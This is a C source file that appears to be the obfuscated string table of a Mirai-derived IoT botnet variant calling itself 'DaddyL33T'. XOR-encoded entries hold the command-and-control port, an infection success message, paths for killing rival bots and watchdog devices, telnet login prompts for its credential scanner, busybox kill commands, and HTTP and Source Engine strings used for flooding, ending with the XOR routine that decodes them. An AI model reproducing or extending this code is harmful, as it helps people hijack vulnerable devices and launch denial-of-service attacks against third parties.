#define _GNU_SOURCE#ifdef DEBUG#include <stdio.h>#endif#include <stdin

1. #define _GNU_SOURCE
2.  
3. #ifdef DEBUG
4. #include <stdio.h>
5. #endif
6. #include <stdint.h>
7. #include <stdlib.h>
8.  
9. #include "includes.h"
10. #include "table.h"
11. #include "util.h"
12.  
13. uint32_t table_key = 0xfeddfllu;
14. struct table_value table[TABLE_MAX_KEYS];
15.  
16. void table_init(void)
17. {
18. /*
19. CONNECTION SHIT
20. */
21. // 420
22. add_entry(TABLE_CNC_PORT, "\x3C\x99", 2);
23. // 48101
24. add_entry(TABLE_SCAN_CB_PORT, "\x86\xD8", 2);
25. /*
26. EXECUTE MSG
27. */
28.  
29. //DaddyL33T Infected Your Shit
30. add_entry(TABLE_EXEC_SUCCESS, "\x79\x5C\x59\x59\x44\x71\x0E\x0E\x69\x1D\x74\x53\x5B\x58\x5E\x49\x58\x59\x1D\x64\x52\x48\x4F\x1D\x6E\x55\x54\x49\x3D", 29);
31. /*
32. KILLER STRINGS
33. */
34. // /proc/
35. add_entry(TABLE_KILLER_PROC, "\x12\x4D\x4F\x52\x5E\x12\x3D", 7);
36. // /exe
37. add_entry(TABLE_KILLER_EXE, "\x12\x58\x45\x58\x3D", 5);
38. // /fd
39. add_entry(TABLE_KILLER_FD, "\x12\x5B\x59\x3D", 4);
40. // /proc/net/tcp
41. add_entry(TABLE_KILLER_TCP, "\x12\x4D\x4F\x52\x5E\x12\x53\x58\x49\x12\x49\x5E\x4D\x3D", 14);
42. // /maps
43. add_entry(TABLE_KILLER_MAPS, "\x12\x50\x5C\x4D\x4E\x3D", 6);
44. // /status
45. add_entry(TABLE_KILLER_STATUS, "\x12\x4E\x49\x5C\x49\x48\x4E\x3D", 8);
46. // .anime
47. add_entry(TABLE_KILLER_ANIME, "\x13\x5C\x53\x54\x50\x58\x3D", 7);
48. // /proc/net/route
49. add_entry(TABLE_MEM_ROUTE, "\x12\x4D\x4F\x52\x5E\x12\x53\x58\x49\x12\x4F\x52\x48\x49\x58\x3D", 16);
50. // /proc/cpuinfo
51. add_entry(TABLE_MEM_CPUINFO, "\x12\x4D\x4F\x52\x5E\x12\x5E\x4D\x48\x54\x53\x5B\x52\x3D", 14);
52. // BOGOMIPS
53. add_entry(TABLE_MEM_BOGO, "\x7F\x72\x7A\x72\x70\x74\x6D\x6E\x3D", 9);
54. // /etc/rc.d/rc.local
55. add_entry(TABLE_MEM_RC, "\x12\x58\x49\x5E\x12\x4F\x5E\x13\x59\x12\x4F\x5E\x13\x51\x52\x5E\x5C\x51\x3D", 19);
56. // g1abc4dmo35hnp2lie0kjf
57. add_entry(TABLE_MEM_MASUTA1, "\x5A\x0C\x5C\x5F\x5E\x09\x59\x50\x52\x0E\x08\x55\x53\x4D\x0F\x51\x54\x58\x0D\x56\x57\x5B\x3D", 23);
58. // assword
59. add_entry(TABLE_MEM_MASUTA2, "\x5C\x4E\x4E\x4A\x52\x4F\x59\x3D", 8);
60. // /dev/watchdog
61. add_entry(TABLE_MEM_MIRAI1, "\x12\x59\x58\x4B\x12\x4A\x5C\x49\x5E\x55\x59\x52\x5A\x3D", 14);
62. // /dev/misc/watchdog
63. add_entry(TABLE_MEM_MIRAI2, "\x12\x59\x58\x4B\x12\x50\x54\x4E\x5E\x12\x4A\x5C\x49\x5E\x55\x59\x52\x5A\x3D", 19);
64. // /dev/FTWDT101_watchdog
65. add_entry(TABLE_MEM_VAMP1, "\x12\x59\x58\x4B\x12\x7B\x69\x6A\x79\x69\x0C\x0D\x0C\x62\x4A\x5C\x49\x5E\x55\x59\x52\x5A\x3D", 23);
66. // /dev/FTWDT101\ watchdog
67. add_entry(TABLE_MEM_VAMP2, "\x12\x59\x58\x4B\x12\x7B\x69\x6A\x79\x69\x0C\x0D\x0C\x61\x1D\x4A\x5C\x49\x5E\x55\x59\x52\x5A\x3D", 24);
68. // /dev/netslink/
69. add_entry(TABLE_MEM_VAMP3, "\x12\x59\x58\x4B\x12\x53\x58\x49\x4E\x51\x54\x53\x56\x12\x3D", 15);
70. /*
71. SCANNER SHIT
72. */
73. //shell
74. add_entry(TABLE_SCAN_SHELL, "\x4E\x55\x58\x51\x51\x3D", 6);
75. //enable
76. add_entry(TABLE_SCAN_ENABLE, "\x58\x53\x5C\x5F\x51\x58\x3D", 7);
77. //system
78. add_entry(TABLE_SCAN_SYSTEM, "\x4E\x44\x4E\x49\x58\x50\x3D", 7);
79. //sh
80. add_entry(TABLE_SCAN_SH, "\x4E\x55\x3D", 3);
81. // /bin/busybox daddyl33t
82. add_entry(TABLE_SCAN_QUERY, "\x12\x5F\x54\x53\x12\x5F\x48\x4E\x44\x5F\x52\x45\x1D\x59\x5C\x59\x59\x44\x51\x0E\x0E\x49\x3D", 23);
83. // daddyl33t: applet not found
84. add_entry(TABLE_SCAN_RESP, "\x59\x5C\x59\x59\x44\x51\x0E\x0E\x49\x07\x1D\x5C\x4D\x4D\x51\x58\x49\x1D\x53\x52\x49\x1D\x5B\x52\x48\x53\x59\x3D", 28);
85. // ncorrect
86. add_entry(TABLE_SCAN_NCORRECT, "\x53\x5E\x52\x4F\x4F\x58\x5E\x49\x3D", 9);
87. // assword
88. add_entry(TABLE_SCAN_ASSWORD, "\x5C\x4E\x4E\x4A\x52\x4F\x59\x3D", 8);
89. // ogin
90. add_entry(TABLE_SCAN_OGIN, "\x52\x5A\x54\x53\x3D", 5);
91. // enter
92. add_entry(TABLE_SCAN_ENTER, "\x58\x53\x49\x58\x4F\x3D", 6);
93. // /bin/busybox ps
94. add_entry(TABLE_SCAN_PS, "\x12\x5F\x54\x53\x12\x5F\x48\x4E\x44\x5F\x52\x45\x1D\x4D\x4E\x3D", 16);
95. // /bin/busybox kill -9
96. add_entry(TABLE_SCAN_KILL_9, "\x12\x5F\x54\x53\x12\x5F\x48\x4E\x44\x5F\x52\x45\x1D\x56\x54\x51\x51\x1D\x10\x04\x3D", 21);
97. /*
98. ATTACK STRINGS
99. */
100. // TSource Engine Query
101. add_entry(TABLE_ATK_VSE, "\x69\x6E\x52\x48\x4F\x5E\x58\x1D\x78\x53\x5A\x54\x53\x58\x1D\x6C\x48\x58\x4F\x44\x3D", 21);
102. // /etc/resolv.conf
103. add_entry(TABLE_ATK_RESOLVER, "\x12\x58\x49\x5E\x12\x4F\x58\x4E\x52\x51\x4B\x13\x5E\x52\x53\x5B\x3D", 17);
104. // nameserver
105. add_entry(TABLE_ATK_NSERV, "\x53\x5C\x50\x58\x4E\x58\x4F\x4B\x58\x4F\x3D", 11);
106. // "Connection: keep-alive"
107. add_entry(TABLE_ATK_KEEP_ALIVE, "\x7E\x52\x53\x53\x58\x5E\x49\x54\x52\x53\x07\x1D\x56\x58\x58\x4D\x10\x5C\x51\x54\x4B\x58\x3D", 23);
108. // "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
109. add_entry(TABLE_ATK_ACCEPT, "\x7C\x5E\x5E\x58\x4D\x49\x07\x1D\x49\x58\x45\x49\x12\x55\x49\x50\x51\x11\x5C\x4D\x4D\x51\x54\x5E\x5C\x49\x54\x52\x53\x12\x45\x55\x49\x50\x51\x16\x45\x50\x51\x11\x5C\x4D\x4D\x51\x54\x5E\x5C\x49\x54\x52\x53\x12\x45\x50\x51\x06\x4C\x00\x0D\x13\x04\x11\x54\x50\x5C\x5A\x58\x12\x4A\x58\x5F\x4D\x11\x17\x12\x17\x06\x4C\x00\x0D\x13\x05\x3D", 83);
110. // "Accept-Language: en-US,en;q=0.8"
111. add_entry(TABLE_ATK_ACCEPT_LNG, "\x7C\x5E\x5E\x58\x4D\x49\x10\x71\x5C\x53\x5A\x48\x5C\x5A\x58\x07\x1D\x58\x53\x10\x68\x6E\x11\x58\x53\x06\x4C\x00\x0D\x13\x05\x3D", 32);
112. // "Content-Type: application/x-www-form-urlencoded"
113. add_entry(TABLE_ATK_CONTENT_TYPE, "\x7E\x52\x53\x49\x58\x53\x49\x10\x69\x44\x4D\x58\x07\x1D\x5C\x4D\x4D\x51\x54\x5E\x5C\x49\x54\x52\x53\x12\x45\x10\x4A\x4A\x4A\x10\x5B\x52\x4F\x50\x10\x48\x4F\x51\x58\x53\x5E\x52\x59\x58\x59\x3D", 48);
114. // "setCookie('"
115. add_entry(TABLE_ATK_SET_COOKIE, "\x4E\x58\x49\x7E\x52\x52\x56\x54\x58\x15\x1A\x3D", 12);
116. // "refresh:"
117. add_entry(TABLE_ATK_REFRESH_HDR, "\x4F\x58\x5B\x4F\x58\x4E\x55\x07\x3D", 9);
118. // "location:"
119. add_entry(TABLE_ATK_LOCATION_HDR, "\x51\x52\x5E\x5C\x49\x54\x52\x53\x07\x3D", 10);
120. // "set-cookie:"
121. add_entry(TABLE_ATK_SET_COOKIE_HDR, "\x4E\x58\x49\x10\x5E\x52\x52\x56\x54\x58\x07\x3D", 12);
122. // "content-length:"
123. add_entry(TABLE_ATK_CONTENT_LENGTH_HDR, "\x5E\x52\x53\x49\x58\x53\x49\x10\x51\x58\x53\x5A\x49\x55\x07\x3D", 16);
124. // "transfer-encoding:"
125. add_entry(TABLE_ATK_TRANSFER_ENCODING_HDR, "\x49\x4F\x5C\x53\x4E\x5B\x58\x4F\x10\x58\x53\x5E\x52\x59\x54\x53\x5A\x07\x3D", 19);
126. // "chunked"
127. add_entry(TABLE_ATK_CHUNKED, "\x5E\x55\x48\x53\x56\x58\x59\x3D", 8);
128. // "keep-alive"
129. add_entry(TABLE_ATK_KEEP_ALIVE_HDR, "\x56\x58\x58\x4D\x10\x5C\x51\x54\x4B\x58\x3D", 11);
130. // "connection:"
131. add_entry(TABLE_ATK_CONNECTION_HDR, "\x5E\x52\x53\x53\x58\x5E\x49\x54\x52\x53\x07\x3D", 12);
132. // "server: dosarrest"
133. add_entry(TABLE_ATK_DOSARREST, "\x4E\x58\x4F\x4B\x58\x4F\x07\x1D\x59\x52\x4E\x5C\x4F\x4F\x58\x4E\x49\x3D", 18);
134. // "server: cloudflare-nginx"
135. add_entry(TABLE_ATK_CLOUDFLARE_NGINX, "\x4E\x58\x4F\x4B\x58\x4F\x07\x1D\x5E\x51\x52\x48\x59\x5B\x51\x5C\x4F\x58\x10\x53\x5A\x54\x53\x45\x3D", 25);
136. // "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
137. add_entry(TABLE_HTTP_ONE, "\x70\x52\x47\x54\x51\x51\x5C\x12\x08\x13\x0D\x1D\x15\x6A\x54\x53\x59\x52\x4A\x4E\x1D\x73\x69\x1D\x0C\x0D\x13\x0D\x06\x1D\x6A\x54\x53\x0B\x09\x06\x1D\x45\x0B\x09\x14\x1D\x7C\x4D\x4D\x51\x58\x6A\x58\x5F\x76\x54\x49\x12\x08\x0E\x0A\x13\x0E\x0B\x1D\x15\x76\x75\x69\x70\x71\x11\x1D\x51\x54\x56\x58\x1D\x7A\x58\x5E\x56\x52\x14\x1D\x7E\x55\x4F\x52\x50\x58\x12\x0B\x0E\x13\x0D\x13\x0E\x0F\x0E\x04\x13\x05\x09\x1D\x6E\x5C\x5B\x5C\x4F\x54\x12\x08\x0E\x0A\x13\x0E\x0B\x3D", 115);
138. // "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
139. add_entry(TABLE_HTTP_TWO, "\x70\x52\x47\x54\x51\x51\x5C\x12\x08\x13\x0D\x1D\x15\x6A\x54\x53\x59\x52\x4A\x4E\x1D\x73\x69\x1D\x0C\x0D\x13\x0D\x06\x1D\x6A\x54\x53\x0B\x09\x06\x1D\x45\x0B\x09\x14\x1D\x7C\x4D\x4D\x51\x58\x6A\x58\x5F\x76\x54\x49\x12\x08\x0E\x0A\x13\x0E\x0B\x1D\x15\x76\x75\x69\x70\x71\x11\x1D\x51\x54\x56\x58\x1D\x7A\x58\x5E\x56\x52\x14\x1D\x7E\x55\x4F\x52\x50\x58\x12\x0B\x0F\x13\x0D\x13\x0E\x0F\x0D\x0F\x13\x04\x09\x1D\x6E\x5C\x5B\x5C\x4F\x54\x12\x08\x0E\x0A\x13\x0E\x0B\x3D", 115);
140. // "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
141. add_entry(TABLE_HTTP_THREE, "\x70\x52\x47\x54\x51\x51\x5C\x12\x08\x13\x0D\x1D\x15\x6A\x54\x53\x59\x52\x4A\x4E\x1D\x73\x69\x1D\x0C\x0D\x13\x0D\x06\x1D\x6A\x54\x53\x0B\x09\x06\x1D\x45\x0B\x09\x06\x1D\x4F\x4B\x07\x08\x0A\x13\x0D\x14\x1D\x7A\x58\x5E\x56\x52\x12\x0F\x0D\x0C\x0D\x0D\x0C\x0D\x0C\x1D\x7B\x54\x4F\x58\x5B\x52\x45\x12\x08\x0A\x13\x0D\x3D", 79);
142. // "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
143. add_entry(TABLE_HTTP_FOUR, "\x70\x52\x47\x54\x51\x51\x5C\x12\x08\x13\x0D\x1D\x15\x6A\x54\x53\x59\x52\x4A\x4E\x1D\x73\x69\x1D\x0B\x13\x0C\x06\x1D\x6A\x54\x53\x0B\x09\x06\x1D\x45\x0B\x09\x14\x1D\x7C\x4D\x4D\x51\x58\x6A\x58\x5F\x76\x54\x49\x12\x08\x0E\x0A\x13\x0E\x0B\x1D\x15\x76\x75\x69\x70\x71\x11\x1D\x51\x54\x56\x58\x1D\x7A\x58\x5E\x56\x52\x14\x1D\x7E\x55\x4F\x52\x50\x58\x12\x0B\x0E\x13\x0D\x13\x0E\x0F\x0E\x04\x13\x05\x09\x1D\x6E\x5C\x5B\x5C\x4F\x54\x12\x08\x0E\x0A\x13\x0E\x0B\x3D", 114);
144. // "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
145. add_entry(TABLE_HTTP_FIVE, "\x70\x52\x47\x54\x51\x51\x5C\x12\x08\x13\x0D\x1D\x15\x6A\x54\x53\x59\x52\x4A\x4E\x1D\x73\x69\x1D\x0B\x13\x0C\x06\x1D\x6A\x54\x53\x0B\x09\x06\x1D\x45\x0B\x09\x14\x1D\x7C\x4D\x4D\x51\x58\x6A\x58\x5F\x76\x54\x49\x12\x08\x0E\x0A\x13\x0E\x0B\x1D\x15\x76\x75\x69\x70\x71\x11\x1D\x51\x54\x56\x58\x1D\x7A\x58\x5E\x56\x52\x14\x1D\x7E\x55\x4F\x52\x50\x58\x12\x0B\x0F\x13\x0D\x13\x0E\x0F\x0D\x0F\x13\x04\x09\x1D\x6E\x5C\x5B\x5C\x4F\x54\x12\x08\x0E\x0A\x13\x0E\x0B\x3D", 114);
146.  
147. /*
148. MISC SHIT
149. */
150. // /dev/watchdog
151. add_entry(TABLE_MISC_WATCHDOG, "\x12\x59\x58\x4B\x12\x4A\x5C\x49\x5E\x55\x59\x52\x5A\x3D", 14);
152. // /dev/misc/watchdog
153. add_entry(TABLE_MISC_WATCHDOG2, "\x12\x59\x58\x4B\x12\x50\x54\x4E\x5E\x12\x4A\x5C\x49\x5E\x55\x59\x52\x5A\x3D", 19);
154. // g1abc4dmo35hnp2lie0kjf
155. add_entry(TABLE_MISC_RAND, "\x5A\x0C\x5C\x5F\x5E\x09\x59\x50\x52\x0E\x08\x55\x53\x4D\x0F\x51\x54\x58\x0D\x56\x57\x5B\x3D", 23);
156. // dvrHelper
157. add_entry(TABLE_MISC_DVRHELP, "\x59\x4B\x4F\x75\x58\x51\x4D\x58\x4F\x3D", 10);
158. }
159.  
160. void table_unlock_val(uint8_t id)
161. {
162. struct table_value *val = &table[id];
163.  
164. #ifdef DEBUG
165. if (!val->locked)
166. {
167. printf("[table] Tried to double-unlock value %d\n", id);
168. return;
169. }
170. #endif
171.  
172. toggle_obf(id);
173. }
174.  
175. void table_lock_val(uint8_t id)
176. {
177. struct table_value *val = &table[id];
178.  
179. #ifdef DEBUG
180. if (val->locked)
181. {
182. printf("[table] Tried to double-lock value\n");
183. return;
184. }
185. #endif
186.  
187. toggle_obf(id);
188. }
189.  
190. char *table_retrieve_val(int id, int *len)
191. {
192. struct table_value *val = &table[id];
193.  
194. #ifdef DEBUG
195. if (val->locked)
196. {
197. printf("[table] Tried to access table.%d but it is locked\n", id);
198. return NULL;
199. }
200. #endif
201.  
202. if (len != NULL)
203. *len = (int)val->val_len;
204. return val->val;
205. }
206.  
207. static void add_entry(uint8_t id, char *buf, int buf_len)
208. {
209. char *cpy = malloc(buf_len);
210.  
211. util_memcpy(cpy, buf, buf_len);
212.  
213. table[id].val = cpy;
214. table[id].val_len = (uint16_t)buf_len;
215. #ifdef DEBUG
216. table[id].locked = TRUE;
217. #endif
218. }
219.  
220. static void toggle_obf(uint8_t id)
221. {
222. int i;
223. struct table_value *val = &table[id];
224. uint8_t k1 = table_key & 0xff,
225. k2 = (table_key >> 8) & 0xff,
226. k3 = (table_key >> 16) & 0xff,
227. k4 = (table_key >> 24) & 0xff;
228.  
229. for (i = 0; i < val->val_len; i++)
230. {
231. val->val[i] ^= k1;
232. val->val[i] ^= k2;
233. val->val[i] ^= k3;
234. val->val[i] ^= k4;
235. }
236.  
237. #ifdef DEBUG
238. val->locked = !val->locked;
239. #endif
240. }